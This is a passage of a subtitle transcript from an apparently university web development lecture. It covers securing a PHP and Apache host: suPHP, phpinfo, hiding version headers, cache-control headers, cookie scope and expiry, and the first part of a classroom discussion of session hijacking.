00:17:50,526 --> 00:17:51,496
on the same server.

424
00:17:51,716 --> 00:17:53,406
So at least it's not
billions of people,

425
00:17:53,406 --> 00:17:54,786
who could potentially
see your code,

426
00:17:55,016 --> 00:17:58,466
but it's at least a few more
malicious users or just curious,

427
00:17:58,466 --> 00:18:00,386
nosy people who are
poking around the account.

428
00:18:00,626 --> 00:18:03,156
So thankfully there do exist
protections against even this,

429
00:18:03,156 --> 00:18:04,546
and even then the
appliance has this built

430
00:18:04,546 --> 00:18:06,596
in even though it's
not strictly necessary

431
00:18:06,596 --> 00:18:09,046
if there's only one John
Harvard and the appliance isn't

432
00:18:09,046 --> 00:18:09,856
on the whole Internet.

433
00:18:10,126 --> 00:18:14,476
But the principle is the same
in that suPHP and other software

434
00:18:14,476 --> 00:18:18,656
like it allows you to
specify that the username

435
00:18:18,656 --> 00:18:21,806
that should be used to
execute this PHP file should

436
00:18:21,806 --> 00:18:22,666
be jharvard.

437
00:18:22,806 --> 00:18:25,136
Shouldn't be HTTPD,
definitely shouldn't be root,

438
00:18:25,286 --> 00:18:27,346
it should be whoever
actually owns the file.

439
00:18:27,656 --> 00:18:30,876
So the idea here is that
when you are running Apache

440
00:18:31,366 --> 00:18:34,646
in the appliance, which
I'm currently doing as,

441
00:18:34,646 --> 00:18:37,676
is anyone else running this
version of it, and I'm going

442
00:18:37,676 --> 00:18:39,576
to run a command that we
haven't run before but just

443
00:18:39,576 --> 00:18:44,916
to poke around, ps aux
and then grep httpd.

444
00:18:45,326 --> 00:18:47,946
So this is a fairly
cryptic sequence of symbols

445
00:18:47,996 --> 00:18:52,066
that simply gives me a process
list, ps, with a bunch of flags

446
00:18:52,066 --> 00:18:53,406
which means show me everything.

447
00:18:53,406 --> 00:18:58,306
The pipe means send the output
of ps to the command grep,

448
00:18:58,306 --> 00:19:00,596
and the grep command
is like a find command.

449
00:19:00,896 --> 00:19:03,276
So I'm saying spit
out the process list,

450
00:19:03,276 --> 00:19:04,876
all the running programs
on the system,

451
00:19:04,876 --> 00:19:07,656
like the activity monitor or
the task manager in Mac OS

452
00:19:07,656 --> 00:19:08,816
and Windows, respectively.

453
00:19:08,816 --> 00:19:12,736
And then pass that output to
grep and search for httpd.

454
00:19:12,736 --> 00:19:14,096
And I'm going to hit enter

455
00:19:14,596 --> 00:19:16,486
and what you see
here is, oh, I lied.

456
00:19:16,576 --> 00:19:20,356
The username that's being used
is not in fact Apache it is --

457
00:19:20,786 --> 00:19:23,606
sorry, not in fact
httpd, its Apache.

458
00:19:23,896 --> 00:19:26,756
So in this case each
of these rows says

459
00:19:26,826 --> 00:19:30,606
that there's a program called
httpd running on the system,

460
00:19:30,736 --> 00:19:32,026
and that's to be
expected, right?

461
00:19:32,026 --> 00:19:34,266
The appliance runs a web
server, that's how project zero,

462
00:19:34,266 --> 00:19:36,576
project one works
in the appliance.

463
00:19:36,576 --> 00:19:37,856
There seems to be a
whole bunch of them,

464
00:19:37,856 --> 00:19:38,986
but more on that in a moment.

465
00:19:39,346 --> 00:19:42,316
But if I scroll to the left
you see in the left most column

466
00:19:42,316 --> 00:19:47,186
who the web server is running as
here and almost all of those are

467
00:19:47,186 --> 00:19:50,656
as Apache, and it's those
rows that are going to be used

468
00:19:50,656 --> 00:19:55,026
to actually execute user
code or serve up user files.

469
00:19:55,416 --> 00:19:57,616
But you don't see jharvard's
name, but that's fine

470
00:19:57,936 --> 00:20:01,536
because notice what's going
to happen here if I go

471
00:20:01,536 --> 00:20:05,776
into my vhost directory
and my appliance directory.

472
00:20:06,066 --> 00:20:08,016
Here's all of our
examples from last time.

473
00:20:08,176 --> 00:20:10,646
I'm going to do a quick and
dirty demo here, demo.php.

474
00:20:10,646 --> 00:20:18,876
And I'm going to
say echo "hello";

475
00:20:19,716 --> 00:20:21,506
just as a quick quick test.

476
00:20:22,006 --> 00:20:24,536
Okay, and let me zoom out.

477
00:20:24,536 --> 00:20:29,086
Let me open by browser,
and let me go

478
00:20:29,086 --> 00:20:33,376
to http://appliance/demo.php.

479
00:20:33,376 --> 00:20:36,556
Okay, so now we're --
this is just sort of,

480
00:20:36,556 --> 00:20:37,676
we did this weeks ago.

481
00:20:37,976 --> 00:20:40,116
So now let's do something
a little more interesting.

482
00:20:40,116 --> 00:20:43,346
Let's so echo 'whoami;

483
00:20:43,536 --> 00:20:49,486
Now notice I'm using back-ticks
mean execute the command

484
00:20:49,726 --> 00:20:50,476
called whoami.

485
00:20:51,116 --> 00:20:53,456
So whoami is a program
on the system,

486
00:20:53,456 --> 00:20:55,556
and I can demonstrate
this at a command prompt.

487
00:20:55,856 --> 00:21:00,556
So let me pause that
program and run whoami enter,

488
00:21:00,556 --> 00:21:01,786
and I'm indeed jharvard.

489
00:21:02,076 --> 00:21:05,376
If I go back in here, the
fact that I'm putting whoami

490
00:21:05,526 --> 00:21:07,096
in the PHP program means

491
00:21:07,236 --> 00:21:09,866
that when this file is
interpreted it's going

492
00:21:09,866 --> 00:21:12,186
to inform me who is
interpreting the file.

493
00:21:12,486 --> 00:21:14,966
And so the litmus test
here is, is it root?

494
00:21:15,256 --> 00:21:16,106
Is it apache?

495
00:21:16,346 --> 00:21:17,396
Or is it jharvard?

496
00:21:17,486 --> 00:21:19,336
Hopefully its jharvard,

497
00:21:19,556 --> 00:21:22,516
otherwise suPHP is
not in fact enabled.

498
00:21:22,886 --> 00:21:24,706
So let's go down here
to the appliance again.

499
00:21:25,386 --> 00:21:28,426
Let's reload, and indeed
I'm running the web server

500
00:21:28,426 --> 00:21:29,536
as Apache.

501
00:21:30,046 --> 00:21:38,916
And if I weren't suPHP we would
instead see the username Apache

502
00:21:39,296 --> 00:21:39,836
in this case.

503
00:21:39,986 --> 00:21:42,986
As an aside, too, another thing
that's useful diagnostically

504
00:21:42,986 --> 00:21:44,506
when you're setting
up your own webhost,

505
00:21:44,506 --> 00:21:46,886
which some of you might want
to do after the class ends,

506
00:21:47,246 --> 00:21:49,676
there's a function in
PHP called phpinfo.

507
00:21:49,996 --> 00:21:51,936
Generally you would
not write a program

508
00:21:52,046 --> 00:21:55,426
and then make it available on
the web that echoes phpinfo

509
00:21:55,426 --> 00:21:57,576
because this dumps
all of the details

510
00:21:57,576 --> 00:22:00,836
of the current php installation,
including its version number

511
00:22:01,086 --> 00:22:03,136
and all of the various
modules that are installed.

512
00:22:03,556 --> 00:22:05,526
But if I go up here and click

513
00:22:05,526 --> 00:22:09,716
on reload this is what
phpinfo spits out.

514
00:22:09,716 --> 00:22:11,036
It deliberately spits
out a whole bunch

515
00:22:11,036 --> 00:22:14,026
of HTML that's crazy
cryptic looking at first

516
00:22:14,246 --> 00:22:18,276
but this configure command
essentially tells you how the

517
00:22:18,316 --> 00:22:22,066
people at Fedora, who
oversee this operating system,

518
00:22:22,526 --> 00:22:24,476
decided to compile
this version of PHP.

519
00:22:24,476 --> 00:22:27,696
So PHP itself recalls a
program, it's an interpreter;

520
00:22:27,696 --> 00:22:30,106
it's an executable program
that happens to read

521
00:22:30,106 --> 00:22:31,426
or interpret other programs.

522
00:22:31,856 --> 00:22:35,086
It itself is written in C,
or C plus plus most likely,

523
00:22:35,316 --> 00:22:38,936
and this is the command
with which they compiled PHP

524
00:22:39,406 --> 00:22:41,356
from source code
into its binary.

525
00:22:41,556 --> 00:22:43,606
And all of these various flags
essentially tell you what

526
00:22:43,606 --> 00:22:44,566
features are enabled.

527
00:22:44,566 --> 00:22:45,916
But there's an easier
way to parse this.

528
00:22:45,916 --> 00:22:48,826
If we scroll down we see
a whole bunch of stuff.

529
00:22:48,826 --> 00:22:52,866
For instance, I mentioned weeks
ago php.ini is the configuration

530
00:22:52,866 --> 00:22:55,436
file that's typically used,
and this output is confirming

531
00:22:55,436 --> 00:22:57,436
as much, that the config
file we're using is

532
00:22:57,436 --> 00:23:01,256
in the etc directory,
called php.ini.

533
00:23:01,476 --> 00:23:04,416
We have, let's see, what
are other particulars here

534
00:23:04,416 --> 00:23:05,676
of interest.

535
00:23:07,016 --> 00:23:10,156
You can see that there's
apparently built in bz2,

536
00:23:10,156 --> 00:23:12,886
which is compression support,
some kind of calendar support,

537
00:23:13,296 --> 00:23:15,006
some kind of -- let's
scroll down -- woops.

538
00:23:15,736 --> 00:23:17,986
Let's scroll down
even further to --

539
00:23:19,016 --> 00:23:20,666
let's see if we can find this.

540
00:23:21,606 --> 00:23:23,496
DOM support and so forth.

541
00:23:23,496 --> 00:23:25,506
So PHP has a whole
bunch of modules

542
00:23:25,506 --> 00:23:26,636
that you can add optionally,

543
00:23:26,816 --> 00:23:29,516
and long story short this
output just informs you what's

544
00:23:29,516 --> 00:23:30,236
actually there.

545
00:23:30,526 --> 00:23:32,196
So this is useful
because sometimes

546
00:23:32,196 --> 00:23:34,706
when you're using commercial
webhosts they might have certain

547
00:23:34,706 --> 00:23:37,456
features on that you did not
have on in the appliance.

548
00:23:37,526 --> 00:23:39,976
They might have certain features
off, and running this, say,

549
00:23:39,976 --> 00:23:42,646
on your local machine, your
Mac, your PC, your appliance,

550
00:23:42,646 --> 00:23:45,846
and then also running this
command on the remote webhost,

551
00:23:45,846 --> 00:23:47,686
like DreamHost, will
give you a sense

552
00:23:47,686 --> 00:23:49,206
of what the differences
might be.

553
00:23:49,206 --> 00:23:54,626
For instance, there is a feature
of PHP called Magic Quotes

554
00:23:54,806 --> 00:23:57,276
and this is largely been
disabled these days,

555
00:23:57,276 --> 00:23:58,786
but Magic Quotes did this.

556
00:23:58,916 --> 00:24:04,736
Anytime a user used GET or POST
to send input to a PHP file,

557
00:24:05,036 --> 00:24:07,376
PHP, if Magic Quotes
were enabled,

558
00:24:07,556 --> 00:24:12,856
would very presumptuously escape
all of the quotes in that input.

559
00:24:12,926 --> 00:24:16,526
So anytime there was a quote
PHP would automatically put a

560
00:24:17,386 --> 00:24:18,286
backslash there.

561
00:24:18,286 --> 00:24:20,766
The upside of this is
that if you then insert

562
00:24:20,766 --> 00:24:24,356
that into your database you're
already safe, for the most part.

563
00:24:24,646 --> 00:24:25,256
Right? Because all

564
00:24:25,256 --> 00:24:27,166
of the potentially dangerous
characters have been escaped.

565
00:24:27,166 --> 00:24:29,036
And we'll come back to SQL
injection attacks in a bit.

566
00:24:29,496 --> 00:24:33,566
The problem though is that if
you then call MySQL real escape

567
00:24:33,566 --> 00:24:36,036
string, or use PDO,
or the equivalent,

568
00:24:36,076 --> 00:24:38,236
it's going to escape
the escaped characters.

569
00:24:38,236 --> 00:24:42,056
And so a symptom that just the
other day someone was seeing was

570
00:24:42,126 --> 00:24:44,926
that her code was spitting out

571
00:24:45,166 --> 00:24:47,636
"/" marks all throughout
her website,

572
00:24:47,636 --> 00:24:51,226
and it was because not only
was she escaping user input,

573
00:24:51,226 --> 00:24:54,776
as is good practice, the web
servers presumptuously doing it

574
00:24:54,776 --> 00:24:57,736
and do just a lot of bad
things happened aesthetically.

575
00:24:57,736 --> 00:24:59,266
So in short, this is
not a good feature

576
00:24:59,266 --> 00:25:01,306
where you should outsource your
security to the web server,

577
00:25:01,306 --> 00:25:02,956
you should be doing
this yourself in code.

578
00:25:03,506 --> 00:25:06,506
So this is something too that
can be helpful diagnostically.

579
00:25:06,506 --> 00:25:08,696
And if I search for this, let's
see if we can find it in here.

580
00:25:09,356 --> 00:25:10,896
Magic -- yeah, there it is here.

581
00:25:10,896 --> 00:25:13,856
So, enable-magic-quotes, but
we've disabled it elsewhere

582
00:25:14,206 --> 00:25:16,716
in the configuration file
even though Fedora enabled it

583
00:25:16,716 --> 00:25:17,436
by default.

584
00:25:18,516 --> 00:25:25,026
All right, so finally,
suPHP then ensures what?

585
00:25:25,486 --> 00:25:29,416
So, if your PHP files are
executed as you, jharvard,

586
00:25:29,416 --> 00:25:33,906
or Axle, or Jack, and you screw
up, and you write buggy PHP code

587
00:25:34,136 --> 00:25:39,256
that somehow allows someone
on the Internet to trick you

588
00:25:39,256 --> 00:25:41,186
into running commands,
not just whoami,

589
00:25:41,186 --> 00:25:45,206
but maybe the delete command,
whose files, whose accounts are

590
00:25:45,206 --> 00:25:46,546
at risk when using
something like suPHP?

591
00:25:46,546 --> 00:25:46,946
Jack?

592
00:25:46,946 --> 00:25:49,116
>> Only their own.

593
00:25:49,116 --> 00:25:50,476
>> Only their own.

594
00:25:50,476 --> 00:25:51,976
Right? You can't
affect other customers,

595
00:25:51,976 --> 00:25:53,206
you can't affect
the root account,

596
00:25:53,206 --> 00:25:54,966
you can't affect the
web server account.

597
00:25:55,296 --> 00:25:57,126
So in general this
is a very good thing.

598
00:25:57,126 --> 00:26:01,806
Meanwhile, files like images
and CSS files and HTML files,

599
00:26:02,026 --> 00:26:05,296
those are just served up, not
as you, but as Apache itself

600
00:26:05,296 --> 00:26:06,076
because it doesn't matter.

601
00:26:06,076 --> 00:26:08,866
Those are static files; they're
not programs being executed.

602
00:26:08,866 --> 00:26:13,006
So suPHP really just
applies here to PHP files.

603
00:26:14,036 --> 00:26:15,986
All right, so you guys
proposed cookies earlier

604
00:26:15,986 --> 00:26:19,646
as a potential threat and
here's one such example.

605
00:26:19,646 --> 00:26:21,656
So these are HTTP headers.

606
00:26:21,656 --> 00:26:24,636
Two hundred at the
top signifies what?

607
00:26:25,366 --> 00:26:25,826
Don't say okay.

608
00:26:25,826 --> 00:26:25,906
Yeah.

609
00:26:25,906 --> 00:26:30,946
>> Everything -- well,
it's really okay,

610
00:26:32,106 --> 00:26:35,716
but that the page has been
received by the client

611
00:26:35,716 --> 00:26:37,796
and there's no error
[inaudible] server side.

612
00:26:37,796 --> 00:26:38,376
>> Okay, good.

613
00:26:38,446 --> 00:26:40,736
So it indicates that there
was no error on the server

614
00:26:40,736 --> 00:26:42,896
and that everything is well,
it's been received okay,

615
00:26:42,896 --> 00:26:45,146
and indeed everything is okay.

616
00:26:45,146 --> 00:26:48,566
So this is in contrast to
something like 404, 401, 500,

617
00:26:48,566 --> 00:26:51,536
all of the various numbers that
we sometimes see on our own

618
00:26:51,536 --> 00:26:53,696
or other people's websites
when mistakes have happened.

619
00:26:54,026 --> 00:26:57,546
But here, 200, you rarely see
and in fact you'll only see it

620
00:26:57,546 --> 00:26:58,906
if you take a look
at the HTTP headers,

621
00:26:59,046 --> 00:27:00,656
because it means all is well.

622
00:27:00,896 --> 00:27:02,386
So we see some other
information.

623
00:27:02,386 --> 00:27:06,086
Date of the current web server,
when this response was made,

624
00:27:06,336 --> 00:27:10,076
the server's name and
version number, X-Powered-By.

625
00:27:10,406 --> 00:27:12,036
Why are these included
in the headers?

626
00:27:12,356 --> 00:27:12,666
Axle?

627
00:27:12,666 --> 00:27:16,796
>> Really no reason
other than [inaudible]

628
00:27:17,676 --> 00:27:22,086
and just Apache selling
their product.

629
00:27:22,356 --> 00:27:23,236
>> Which is free, in fairness.

630
00:27:23,746 --> 00:27:26,596
>> Yeah. No, no, no, but they
are telling people about it

631
00:27:26,636 --> 00:27:30,016
and it could be a
potential security risk

632
00:27:30,016 --> 00:27:32,666
because you are telling
people what version

633
00:27:32,666 --> 00:27:33,796
of PHP you are running.

634
00:27:33,956 --> 00:27:34,186
>> Good.

635
00:27:34,186 --> 00:27:38,706
>> So if, for example, we saw
an older version in the PHP

636
00:27:38,706 --> 00:27:42,926
and later we had discovered
like a flaw in that,

637
00:27:42,926 --> 00:27:44,496
something that you do with
that, you would know that,

638
00:27:44,736 --> 00:27:46,316
well this server's vulnerable

639
00:27:46,316 --> 00:27:48,336
and now you can search the
Internet for those servers.

640
00:27:48,336 --> 00:27:48,876
>> Exactly.

641
00:27:48,996 --> 00:27:51,956
So one is branding, that's why
it's there for the most part.

642
00:27:52,206 --> 00:27:53,886
But two, the downside of this is

643
00:27:53,886 --> 00:27:56,216
that you're telling the whole
not only what you're running

644
00:27:56,216 --> 00:27:57,216
but what version of it.

645
00:27:57,536 --> 00:28:01,716
So as Axle says, if there's
somehow a flaw discovered in PHP

646
00:28:01,946 --> 00:28:05,006
or in Apache, and it's in a
specific version of one of those

647
00:28:05,006 --> 00:28:07,316
because it was introduced
accidentally at some point.

648
00:28:07,716 --> 00:28:09,776
Well now, you've just told
the whole world that hey,

649
00:28:09,826 --> 00:28:12,446
I'm vulnerable to this
error and if someone is kind

650
00:28:12,506 --> 00:28:14,766
of like aggregating that
information and hanging onto it

651
00:28:14,766 --> 00:28:17,976
for a rainy day the moment
the world realizes that oh,

652
00:28:18,096 --> 00:28:20,676
PHP 5.3.3 is buggy,
let me go ahead

653
00:28:20,676 --> 00:28:23,846
and wage my attack using the
list I gathered in advance

654
00:28:24,166 --> 00:28:28,806
by poking around on the Internet
to compromise those servers.

655
00:28:28,916 --> 00:28:31,306
So you're just making
it unnecessarily easy

656
00:28:31,306 --> 00:28:31,996
for the adversary.

657
00:28:31,996 --> 00:28:33,816
So this kind of stuff is
typically on by default

658
00:28:34,006 --> 00:28:36,476
but where can you disable
something like the Apache line?

659
00:28:37,306 --> 00:28:38,336
It's version number?

660
00:28:40,276 --> 00:28:41,156
Where would you go?

661
00:28:41,156 --> 00:28:45,486
So if you agree that
this is not necessary

662
00:28:45,486 --> 00:28:47,866
and not great how do
you go turning this off?

663
00:28:48,426 --> 00:28:48,526
Jack?

664
00:28:49,796 --> 00:28:52,736
>> Isn't it somewhere
in the httpd.conf?

665
00:28:52,856 --> 00:28:54,816
>> Good. Yeah, so there's
this file we keep referring

666
00:28:54,816 --> 00:28:57,096
to httpd.conf.

667
00:28:57,446 --> 00:29:00,446
It's generally somewhere
in the etc directory,

668
00:29:00,446 --> 00:29:02,386
the et cetera directory,
and you just have

669
00:29:02,386 --> 00:29:04,576
to find the appropriate
line there that has to do

670
00:29:04,576 --> 00:29:07,536
with OS tokens, which will
reveal whether or not --

671
00:29:07,696 --> 00:29:11,086
tokens, whether or not
this will be displayed.

672
00:29:11,236 --> 00:29:13,956
And how about something
related to PHP, X-Powered-By,

673
00:29:13,956 --> 00:29:16,526
how do you get rid of that?

674
00:29:16,736 --> 00:29:16,996
Axle?

675
00:29:17,606 --> 00:29:20,306
>> [Inaudible] to the php.ini.

676
00:29:20,686 --> 00:29:23,096
>> Yeah, exactly,
php.ini, the config file

677
00:29:23,096 --> 00:29:25,436
for PHP specifically,
there's a directive

678
00:29:25,436 --> 00:29:27,986
in there called expose
php, which by default is

679
00:29:27,986 --> 00:29:29,926
on you just have
to change it to off

680
00:29:29,926 --> 00:29:31,846
and then restart the web server.

681
00:29:32,356 --> 00:29:36,556
All right, so more interesting
is this expires date.

682
00:29:36,556 --> 00:29:37,546
This is kind of weird, right?

683
00:29:37,546 --> 00:29:42,006
I definitely didn't make
this example in 1981 and

684
00:29:42,006 --> 00:29:45,116
yet for some reason
there's mention of 1981.

685
00:29:45,176 --> 00:29:48,496
Thursday, 19 November, 1981 in
my headers, for some reason.

686
00:29:49,136 --> 00:29:51,776
Expires. Why is this here?

687
00:29:52,756 --> 00:29:58,566
Frankly, the Apache version
two and PHP 5.3.3 did not exist

688
00:29:58,566 --> 00:29:59,976
in 1981, let alone the web.

689
00:30:00,736 --> 00:30:04,776
At least in this form.

690
00:30:05,256 --> 00:30:09,346
What could that possibly
signify?

691
00:30:10,746 --> 00:30:11,606
Yeah? Scott?

692
00:30:12,516 --> 00:30:15,936
[ Inaudible Speaker ]

693
00:30:16,436 --> 00:30:19,366
Okay. So in this case it's
actually not the expiration date

694
00:30:19,366 --> 00:30:21,476
for the cookie, though
that's on the right track,

695
00:30:21,476 --> 00:30:23,116
but it's the expiration
date for the page.

696
00:30:23,116 --> 00:30:27,236
So if a browser and server
are trying to optimize so as

697
00:30:27,236 --> 00:30:29,876
to not re-download this
content unnecessarily

698
00:30:29,876 --> 00:30:30,946
if it hasn't changed,

699
00:30:31,286 --> 00:30:33,646
the expiration here
is telling the browser

700
00:30:33,776 --> 00:30:35,776
that this page expired
in the past,

701
00:30:35,776 --> 00:30:38,366
which means you should
always re-fetch it.

702
00:30:38,366 --> 00:30:40,536
And this is actually just
kind of a stupid convention;

703
00:30:40,536 --> 00:30:44,296
essentially what most
websites do is if you want

704
00:30:44,296 --> 00:30:48,056
to disable caching or try
to disable caching of things

705
00:30:48,056 --> 00:30:50,916
like HTML files that
are generated by PHP,

706
00:30:50,916 --> 00:30:53,176
or really whatever file
this is referring to here,

707
00:30:53,406 --> 00:30:56,056
you specify that this page
expired like 10 years ago.

708
00:30:56,416 --> 00:30:58,436
Right? So then you don't
do like a minute ago,

709
00:30:58,436 --> 00:30:59,416
you don't do an hour ago,

710
00:30:59,416 --> 00:31:01,086
just in case there's
a bit of clock skew.

711
00:31:01,086 --> 00:31:03,676
You choose something that's
really far in the past so that

712
00:31:03,676 --> 00:31:06,566
when the web server -- when the
browser receives this it's going

713
00:31:06,566 --> 00:31:08,596
to realize wow, this
page is really old,

714
00:31:08,926 --> 00:31:10,976
the next time you request
the same URL I'm going

715
00:31:10,976 --> 00:31:14,436
to definitely request it
again and not go to my cache.

716
00:31:14,826 --> 00:31:17,206
So not all browsers
historically have respected all

717
00:31:17,206 --> 00:31:19,026
of these things, so we have
an additional header here,

718
00:31:19,026 --> 00:31:21,656
Cache-Control: no-store,
no-cache, must-revalidate.

719
00:31:21,836 --> 00:31:23,526
All these possible
directives trying

720
00:31:23,526 --> 00:31:24,866
to really discourage caching.

721
00:31:25,186 --> 00:31:28,516
So in general you'll find
that this is a combination

722
00:31:28,516 --> 00:31:30,576
of techniques that people
use for various browsers.

723
00:31:30,626 --> 00:31:33,126
Pragma: no-cache is yet
another header that's meant

724
00:31:33,126 --> 00:31:34,966
to further discourage caching.

725
00:31:34,966 --> 00:31:37,036
At the end of the day the
browser can still do whatever it

726
00:31:37,036 --> 00:31:39,136
wants, so these various
headers exist really

727
00:31:39,136 --> 00:31:42,826
to really encourage the browser
to cooperate and not cache.

728
00:31:43,186 --> 00:31:46,366
But there in bold is our
Set-Cookie header, PHPSESSID,

729
00:31:46,366 --> 00:31:50,006
big random sequence of
letters and numbers, path,

730
00:31:50,006 --> 00:31:54,126
and Set-Cookie: secret equals
12345 is not a session cookie,

731
00:31:54,496 --> 00:31:56,626
but what are some of
the takeaways here?

732
00:31:56,626 --> 00:31:59,856
So one, the set cookie
here does not seem

733
00:31:59,856 --> 00:32:02,846
to have an expiration
time associated with it.

734
00:32:03,216 --> 00:32:05,336
It's not -- there's no
mention of seven days

735
00:32:05,336 --> 00:32:06,646
from now, an hour from now.

736
00:32:06,646 --> 00:32:07,686
So what's the implication?

737
00:32:07,946 --> 00:32:08,376
Axle?

738
00:32:08,976 --> 00:32:10,666
>> Well, it's going
to live forever

739
00:32:10,726 --> 00:32:19,846
so anybody finding your
computer in a week will be able

740
00:32:20,166 --> 00:32:21,246
to see the cookie
and anyone -- yeah.

741
00:32:21,246 --> 00:32:24,376
>> So, careful, it's actually
the opposite in this case.

742
00:32:24,406 --> 00:32:26,716
So PHPSESSID -- so when
you set an expiration

743
00:32:26,716 --> 00:32:29,566
to zero whereby you
don't have an expiration

744
00:32:29,566 --> 00:32:32,126
that actually means the opposite
which is that this only going

745
00:32:32,126 --> 00:32:33,526
to live for the life
of the browser.

746
00:32:33,526 --> 00:32:37,186
So as soon as you close your --
quit your browser or even worse,

747
00:32:37,186 --> 00:32:38,296
restart your computer,

748
00:32:38,566 --> 00:32:40,266
that session cookie
is going to be lost.

749
00:32:40,316 --> 00:32:43,906
The server might still have the
contents of your session stored

750
00:32:43,906 --> 00:32:46,416
around in a temp file
or in a database,

751
00:32:46,636 --> 00:32:48,626
but your browser is not supposed

752
00:32:48,626 --> 00:32:52,796
to resend this cookie once you
have actually quit the browser.

753
00:32:52,796 --> 00:32:55,366
Now, changing tabs, sometimes
the behavior is not quite

754
00:32:55,366 --> 00:32:57,116
predictable but generally

755
00:32:57,266 --> 00:33:00,456
until you quit your browser
session cookies might linger,

756
00:33:00,596 --> 00:33:02,986
but a session cookie by
definition is meant to live only

757
00:33:02,986 --> 00:33:05,396
for the life of the
browser actually running.

758
00:33:05,526 --> 00:33:06,686
When you quit it,
it should go away.

759
00:33:07,096 --> 00:33:10,436
By contrast if you actually
saw an expiration date next

760
00:33:10,436 --> 00:33:13,566
to path here, path is slash,
just signifying the root

761
00:33:13,566 --> 00:33:15,476
of the web server,
then you could specify

762
00:33:15,476 --> 00:33:18,966
that this cookie is in fact good
for a week, a month, a year,

763
00:33:19,146 --> 00:33:21,526
and you could typically do
that yourself if you wanted

764
00:33:21,526 --> 00:33:23,306
to remember something
for some amount of time.

765
00:33:23,636 --> 00:33:25,956
So the second Set-Cookie
line here is just stupid.

766
00:33:26,146 --> 00:33:28,536
It seems that the programmer

767
00:33:28,536 --> 00:33:33,836
of this webpage has specified
a secret key of 12345.

768
00:33:33,836 --> 00:33:36,246
In other words, feels
like the website is trying

769
00:33:36,246 --> 00:33:38,366
to remember your password
by storing it in a cookie.

770
00:33:38,686 --> 00:33:39,776
So what is bad about this?

771
00:33:39,776 --> 00:33:42,166
Well one, there's absolutely
no reason as we've seen

772
00:33:42,166 --> 00:33:44,376
to store the user's
password in a cookie.

773
00:33:44,656 --> 00:33:48,156
It suffices in PHP through
all of our login examples just

774
00:33:48,156 --> 00:33:53,396
to use the session and just
remember the user by way

775
00:33:53,396 --> 00:33:54,676
of this random identifier.

776
00:33:54,676 --> 00:33:57,066
You don't have to have the
user send you his username

777
00:33:57,066 --> 00:33:59,016
and password, again,
and again, and again.

778
00:33:59,346 --> 00:34:01,536
So this would be
indicative of bad practice

779
00:34:01,536 --> 00:34:04,426
or at least an opportunity
now for a bad guy to kind

780
00:34:04,426 --> 00:34:06,716
of do something malicious
with that.

781
00:34:06,896 --> 00:34:07,946
Yeah? Axle?

782
00:34:08,256 --> 00:34:10,636
>> I have a question.

783
00:34:10,706 --> 00:34:13,946
When I work with cookies
[inaudible] specify which domain

784
00:34:13,946 --> 00:34:16,116
and sub-domain the
cookie was valid in,

785
00:34:16,116 --> 00:34:19,226
so not specifying [inaudible]
that make the cookie valid

786
00:34:19,386 --> 00:34:22,656
in all sub-domains of
the root of the path?

787
00:34:22,656 --> 00:34:23,946
>> Exactly, in this case.

788
00:34:23,946 --> 00:34:26,896
Yeah. So, if we had visited
foo.com, the cookie is valid

789
00:34:26,896 --> 00:34:29,436
for foo.com and anything
above it.

790
00:34:30,126 --> 00:34:32,316
So dub dub dub foo
-- bar.foo.com.

791
00:34:32,316 --> 00:34:33,566
or the like.

792
00:34:33,566 --> 00:34:35,416
>> Would that be a
security threat as well

793
00:34:35,416 --> 00:34:38,566
if you were running a big site
that has multiple sub-domains?

794
00:34:38,646 --> 00:34:39,546
>> It's a good question.

795
00:34:39,546 --> 00:34:40,406
Potentially yes.

796
00:34:40,406 --> 00:34:42,606
If you're running a big site
with multiple sub-domains,

797
00:34:42,606 --> 00:34:44,886
or different applications,
web applications running

798
00:34:44,886 --> 00:34:46,826
at different sub-domains,
absolutely.

799
00:34:46,826 --> 00:34:49,006
Generally you should put cookies

800
00:34:49,396 --> 00:34:52,666
in the most narrowly defined
cookie space as possible.

801
00:34:52,906 --> 00:34:55,896
So if you have a website
that is, again, foo.com,

802
00:34:56,116 --> 00:35:00,166
and you have a.foo.com,
b.foo.com, c.foo.com,

803
00:35:00,166 --> 00:35:02,106
all of which are
different applications maybe

804
00:35:02,106 --> 00:35:03,966
with different users,
different functionality,

805
00:35:04,246 --> 00:35:06,646
then you should really
be setting your cookies

806
00:35:06,776 --> 00:35:09,266
in a.foo.com, or b.foo.com,

807
00:35:09,266 --> 00:35:12,246
and nothing should
go in foo.com itself.

808
00:35:12,916 --> 00:35:13,726
Really good point.

809
00:35:14,466 --> 00:35:17,256
You can also mitigate
this in some part by,

810
00:35:17,256 --> 00:35:18,916
as we saw with mod rewrites,

811
00:35:18,916 --> 00:35:21,086
the ability to redirect the
user to different URL's.

812
00:35:21,086 --> 00:35:23,516
If you want to standardize
not on CS75.net,

813
00:35:23,746 --> 00:35:27,286
but dub dub dub.CS75.net,
you can ensure

814
00:35:27,286 --> 00:35:28,696
through a redirect mechanism

815
00:35:28,696 --> 00:35:30,016
that you're only
planting the cookies

816
00:35:30,016 --> 00:35:33,246
in the DUB DUB DUB version
ultimately, which can be useful.

817
00:35:33,776 --> 00:35:37,716
All right, so let's
push a little harder

818
00:35:37,716 --> 00:35:39,896
on this cookie issue
in session hijacking.

819
00:35:39,896 --> 00:35:42,456
So session hijacking, again, to
be clear, refers to the process

820
00:35:42,456 --> 00:35:44,466
of someone stealing
your cookie somehow,

821
00:35:44,466 --> 00:35:47,076
whether by sitting near you
in Starbucks, or having access

822
00:35:47,076 --> 00:35:49,316
to the routers on the Internet
between Points A and B,

823
00:35:49,496 --> 00:35:52,716
and then presenting it to
the world as their own.

824
00:35:53,316 --> 00:35:56,676
Now how can go about
hijacking someone's session?

825
00:35:56,916 --> 00:35:58,036
Well physical access.

826
00:35:59,186 --> 00:36:01,246
If you have physical access to
someone's computer how do you go

827
00:36:01,246 --> 00:36:02,376
about finding their
session cookie?

828
00:36:02,376 --> 00:36:02,556
Yeah, Jack?

829
00:36:02,646 --> 00:36:03,986
>> You find their cookies folder

830
00:36:03,986 --> 00:36:05,896
and you take whatever
is in there.

831
00:36:05,896 --> 00:36:06,376
>> Yeah, exactly.

832
00:36:06,376 --> 00:36:08,276
You can poke around in
some operating systems,

833
00:36:08,276 --> 00:36:10,466
in some browsers, literally
to a folder somewhere

834
00:36:10,466 --> 00:36:12,056
on the hard drive
that contains cookies.

835
00:36:12,056 --> 00:36:15,506
Now in fact, the folder tends
not to contain session cookies

836
00:36:15,556 --> 00:36:17,906
because it tends to
contain persistent cookies

837
00:36:17,906 --> 00:36:20,246
that have an expiration
that's not zero,

838
00:36:20,646 --> 00:36:23,166
but in this case you
can probably open like,

839
